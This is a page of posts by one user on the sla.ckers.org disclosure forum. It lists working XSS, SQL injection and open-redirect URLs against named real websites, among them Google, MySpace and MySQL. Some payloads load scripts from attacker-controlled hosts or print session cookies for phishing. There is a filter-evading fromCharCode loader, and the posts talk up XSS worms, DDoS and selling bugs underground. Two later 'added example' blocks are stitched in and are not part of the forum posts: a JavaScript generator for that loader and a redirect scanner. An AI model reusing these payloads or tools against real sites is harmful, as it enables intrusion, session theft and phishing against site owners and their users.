Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Current Page: 1 of 2
Results 1 - 30 of 39
7 years ago
alf
haha, now let's go and play! ;-) Would be a nice PoC if 10 of us could ban a couple of thousand users from their homepage.
Forum: Full Disclosure
7 years ago
alf
It seems you're making good $$$ with all this traffic, so now everybody get up and tell them your exploits! Don't be cowards!
Forum: Full Disclosure
7 years ago
alf
hehe, of course Google lurks around here... I don't like them any more.
Forum: XSS Info
7 years ago
alf
"AOL scene" hehe, that's the right term ;)
Forum: Full Disclosure
7 years ago
alf
perhaps a bit off-topic: did you ever think about DDoS attacks caused by e.g. some kind of "social" site or community which has some XSS issues? Now build a small XSS worm which autospreads and let the affected users abuse SQL injection flaws (huge queries, ' OR '1'='1). Have seen this in the wild.
Forum: CSRF and Session Info
7 years ago
alf
... they just want some geeks to audit their homepage in order not to have to spend any money on web security. You are able to sell these issues for large $$$ in the underground, but if you send them directly to Microsoft they will fix it and some low-ranking worker will say "thank you" for your work. Great.
Forum: Full Disclosure
7 years ago
alf
tx Wrote:
> http://animaldiversity.ummz.umich.edu/local/redirect.php/http://www.google.com
> http://rd.business.com/index.asp?bdcu=http://www.google.com
> http://www.ktuh.org/redirect.php?http://www.google.com.
> http://www.fasterskier.com/events/results.php?http://www.google.com
> http://ozrep
Forum: Full Disclosure
7 years ago
alf
yes I'm good ;-) Google XSS flaw by me ( http://www.mybeNi.tk ) https://www.google.com/accounts/ServiceLogin?service=adsense&hl=de&ifr=true&passive=true&rm=hide&afpui=3&nui=15&alwf=true&continue=https%3A%2F%2Fwww.google.com%2Fadsense%2Fgaiaauth&followup=https%3A%2F%2Fwww.google.com%2Fadsense%2Fgaiaauth&ltmpl=%22%3E%3Cscript%3Edocument.body.innerHTML%3D
Forum: Full Disclosure
7 years ago
alf
btw I had XSS in my user agent for some time as well, and suddenly I was banned from all the governmental homepages... I removed the user agent and set it to default and it worked again ;-) So I think my JavaScript alert scared a sysop like hell :P (while reading the logs in his CMS)
Forum: Search Engine Hacking and SEO
7 years ago
alf
rsnake Wrote:
> Until something bad happens most companies don't jump on XSS I've found. Most of the larger companies jump on it simply because it's bad to have anyone lose trust in your site - and that is caused when the media picks up the stories.
hah lol I don't believe this. why didn't eBay, YouTube, Amazon
Forum: Full Disclosure
7 years ago
alf
blah
asap!
Forum: Privacy
7 years ago
alf
blah
cheers
Forum: Privacy
7 years ago
alf
now make someone click on "here" and phish MySpace cookies... http://profile.myspace.com/index.cfm?fuseaction=cms.goto&_i=acca0978-f1be-4af3-902d-11afaccc71e8&_u=data:text/html,%3Cbody%20onLoad=document.write(document.cookie)%3E%3C/body%3E
Forum: Full Disclosure
7 years ago
alf
http://www.myspace.com/antiphishing have a look at it; if somebody wants to play with it, PM me. For you lazy folks: in the textbox there's the CSS code to move your div over MySpace's "main content". Any other ideas for funny domains? cheers alf.
Forum: Full Disclosure
7 years ago
alf
Thank you for contacting MySQL AB, We have fixed this, thanks again for pointing it out to us. Hope this helps, MySQL Web Team
---------------------------------------------------------------------
nah, 2 sentences, I hoped for more :( cheers alf
Forum: Full Disclosure
7 years ago
alf
hm, I mean I'm no database guru, but if my "logical stuff" is executed, I could find out the table_name and DROP the table; if you find out the users table then you'll probably be able to get passwords (hashes). But that's quite a lot of work, I think. cheers
Forum: Full Disclosure
7 years ago
alf
some XSS out of my golden box... yeh, my penis is very long ;-) http://joblo.com/tellafriend.php?id=14018'%22%3E%3Cscript%20src=http://mybeNi.rootzilla.de/mybeNi/xw.js%3E%3C/script%3E wah, I got loads of beautiful XSS but I don't really wanna disclose 'em :(
Forum: Full Disclosure
7 years ago
alf
http://mysql.com/customers/customer.php?id=38%20AND%201=1 imho very funny ;-) The webmaster got informed; the full-disclosure list will be notified asap after the webmaster has replied. cheers alf
Forum: Full Disclosure
7 years ago
alf
okay, here's my version without +, - and quotes (I saw some servers filter the + and - operators, kinda crazy): x=document.createElement(String.fromCharCode(115,99,114,105,112,116));x.src=String.fromCharCode(1,2,3,4);document.body.appendChild(x); Now we need a way to execute JS without the script tags ;)
Forum: XSS Info
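As an added example (not code from alf's post), the encoder below generalises the fromCharCode trick in the post above: it turns any script URL into the same quote-free, operator-free loader, checks that the result would survive a naive "strip quotes and +/-" filter, and decodes such a payload back to readable text the way an analyst reading a server log would. The URL http://example.test/x.js and the filter's character set are assumptions.

```javascript
// Added example, not from the original post. Assumes the target filter strips
// ' " + and - but leaves letters, digits, dots, parentheses and commas alone.

// Encode a string as a String.fromCharCode(...) call: no quotes, no + or -.
function toCharCodeCall(s) {
  const codes = Array.from(s, (ch) => ch.charCodeAt(0));
  return `String.fromCharCode(${codes.join(',')})`;
}

// Build the loader from the post for an arbitrary script URL: create a
// <script> element, point its src at the URL, append it to <body>.
function buildLoader(scriptUrl) {
  return [
    `x=document.createElement(${toCharCodeCall('script')});`,
    `x.src=${toCharCodeCall(scriptUrl)};`,
    'document.body.appendChild(x);',
  ].join('');
}

// Filter author's view: does the payload contain none of the characters a
// naive filter would strip? (true means the filter would not touch it)
function survivesNaiveFilter(payload) {
  return payload.replace(/['"+\-]/g, '') === payload;
}

// Analyst's view: expand every String.fromCharCode(...) call back into a
// quoted string literal so the intent is readable in a log entry.
function decodeCharCodeCalls(payload) {
  return payload.replace(/String\.fromCharCode\(([\d,]+)\)/g, (_, list) =>
    JSON.stringify(String.fromCharCode(...list.split(',').map(Number)))
  );
}

// Stand-alone demo with the assumed (hypothetical) script URL.
const DEMO_PAYLOAD = buildLoader('http://example.test/x.js');
console.log(DEMO_PAYLOAD);
console.log('survives naive filter:', survivesNaiveFilter(DEMO_PAYLOAD));
console.log('decoded:', decodeCharCodeCalls(DEMO_PAYLOAD));
```

The defensive takeaway is the one the post hints at: blacklisting a few characters does nothing against a payload that never needs them, so output encoding of the reflected parameter is the only fix that holds.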
7 years ago
alf
OT: I posted one for turkishdailynews some posts above, but nevertheless nice find =)
Forum: Full Disclosure
7 years ago
alf
yeh I know, I apologize for the placement in the wrong board, and thanks for your solution maluc! <3 cheers alf
Forum: XSS Info
7 years ago
alf
I was just playing around with my XSS list and automated it a bit, then I saw something strange: http://www.wintotal.de/Suche/index.php?suchtext='%22%3E%3Cscript%20src=%22asd://bla.com/xw.js%22%3E%3C/script%3E obviously this is XSS, but if you insert http://www.wintotal.de/Suche/index.php?suchtext='%22%3E%3Cscript%20src=%22http://my.xss.file.js%22%3E%3C/script%3E there's a fine /* 40
Forum: XSS Info
7 years ago
alf
rsnake Wrote:
> Unfortunately I stumbled upon an SQL injection issue once (the quotes I guess) and it actually brought the server down (oops!). After that I stayed clear of injecting XSS via user agents.
LMAO, the same thing happened to me at the beginning of this year, the page of a big airport, lil' alfie found the
Forum: Search Engine Hacking and SEO
7 years ago
alf
With me it's the same as maluc + jungsonn... Just yesterday I phoned a "web design" company having - not kidding - XSS flaws within every single page they coded (PHP ^.^). They told me they'd fix it, and I also sent them an email including the XSS links; some have been fixed, the majority is still open _and_ they didn't even say ty :( I mean in the future I probably won't point out the f
Forum: Full Disclosure
7 years ago
alf
mesca Wrote:
> alf,
>
> > http://www.MAN.de
>
> Funny, I was auditing a Typo3 website last month for a big company and found a lot of issues around this tt_news module.
>
> Hint: there are also some problems with Typo3 core and some other modules. I signed a non-disclosure agreement s
Forum: Full Disclosure
7 years ago
alf
http://www.gmx.net/dereferer.do?dest=http%3A%2F%2Fwww.mybeNi.tk
http://toi.passul.t-online.de/cgi-bin/XP/toi/pers/dsl/mehr01,toi/pers/ziel,0,2,1?l=http://www.mybeNi.tk
http://www.arcor.de/home/extern_track.php?url=http://www.mybeNi.tk&name=click-shopping&kat=nav
http://www.rtl.de/tools/count/xdot/count.php?id=12&artikelid=12&dst=http://www.mybeNi.tk
http://cre.chunnel.de/bounce
Forum: Full Disclosure
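An added example, not part of alf's post: a small checker for the pattern these redirector URLs share, a query parameter (or, as in the yahoo.com URL in the next post, a trailing path segment) that carries an absolute URL whose domain differs from the page's own. The sample URLs are copied from the posts on this page; the example.test control URL and the two-label "registrable domain" approximation are assumptions.

```javascript
// Added example, not from the original post. Run with Node (uses the WHATWG URL API).

// Sample input: redirector URLs from this page plus one constructed control
// URL (example.test) that carries no external target.
const SAMPLES = [
  'http://www.gmx.net/dereferer.do?dest=http%3A%2F%2Fwww.mybeNi.tk',
  'http://toi.passul.t-online.de/cgi-bin/XP/toi/pers/dsl/mehr01,toi/pers/ziel,0,2,1?l=http://www.mybeNi.tk',
  'http://www.arcor.de/home/extern_track.php?url=http://www.mybeNi.tk&name=click-shopping&kat=nav',
  'http://www.rtl.de/tools/count/xdot/count.php?id=12&artikelid=12&dst=http://www.mybeNi.tk',
  'http://de.ard.yahoo.com/SIG=12lnn77nh/M=200084491.201287525.202593797.200702075/D=finfr/S=97107386:FB2/Y=FR/EXP=1163448820/A=200544671/R=0/SIG=113es77l7/*http://www.mybeNi.tk',
  'http://www.example.test/page.php?id=12&kat=nav', // constructed control
];

// Assumption: "registrable domain" = last two labels. Fine for the hosts here;
// a real tool would consult the public suffix list instead.
function baseDomain(host) {
  return host.toLowerCase().split('.').slice(-2).join('.');
}

// Return every {param, target} whose value is an absolute http(s) URL on a
// domain other than the page's own. An empty list means no candidate found.
function findRedirectParams(rawUrl) {
  const u = new URL(rawUrl);
  const own = baseDomain(u.hostname);
  const hits = [];

  // Query parameters: URLSearchParams already percent-decodes the values.
  for (const [name, value] of u.searchParams) {
    if (!/^https?:\/\//i.test(value)) continue;
    let target;
    try { target = new URL(value); } catch { continue; }
    if (baseDomain(target.hostname) !== own) {
      hits.push({ param: name, target: target.hostname });
    }
  }

  // Path-embedded destination, e.g. the ".../*http://host" style.
  const m = u.pathname.match(/https?:\/\/([^/?#]+)/i);
  if (m && baseDomain(m[1]) !== own) {
    hits.push({ param: '<path>', target: m[1].toLowerCase() });
  }
  return hits;
}

// Scan a list of URLs and pair each with its findings.
function scan(urls) {
  return urls.map((url) => ({ url, hits: findRedirectParams(url) }));
}

console.log(JSON.stringify(scan(SAMPLES), null, 2));
```

The check is deliberately host-based: a redirector that only forwards to its own domain is harmless, so comparing the target's registrable domain against the page's own is what separates a real open redirect from an internal link tracker.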
7 years ago
alf
http://de.ard.yahoo.com/SIG=12lnn77nh/M=200084491.201287525.202593797.200702075/D=finfr/S=97107386:FB2/Y=FR/EXP=1163448820/A=200544671/R=0/SIG=113es77l7/*http://www.mybeNi.tk dunno if this was here before
Forum: Full Disclosure
7 years ago
alf
some fresh ones for the relaunch of my homepage:
http://www.wintotal.de/User/LogInOut.php?URL='%22%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://leaguez.yusho.de/?module=news'%22%3Cscript%3Ealert(123)%3C/script%3E
http://www.MAN.de/index.php?id=520&tx_ttnews=1585&tx_ttnews=262'%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://www.genomics.sinica.edu.tw/index.php?t=13'%22%3E%3Cscri
Forum: Full Disclosure
7 years ago
alf
http://adclient.uimserv.net/event.ng/Type=click&Redirect=http://www.n0n4m3-cr3w.de/Subdomain_Service/alf/index.php?ct=apps
Forum: Full Disclosure
7 years ago
alf
http://www.turkishdailynews.com.tr/article.php?enewsid=58929%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
Forum: Full Disclosure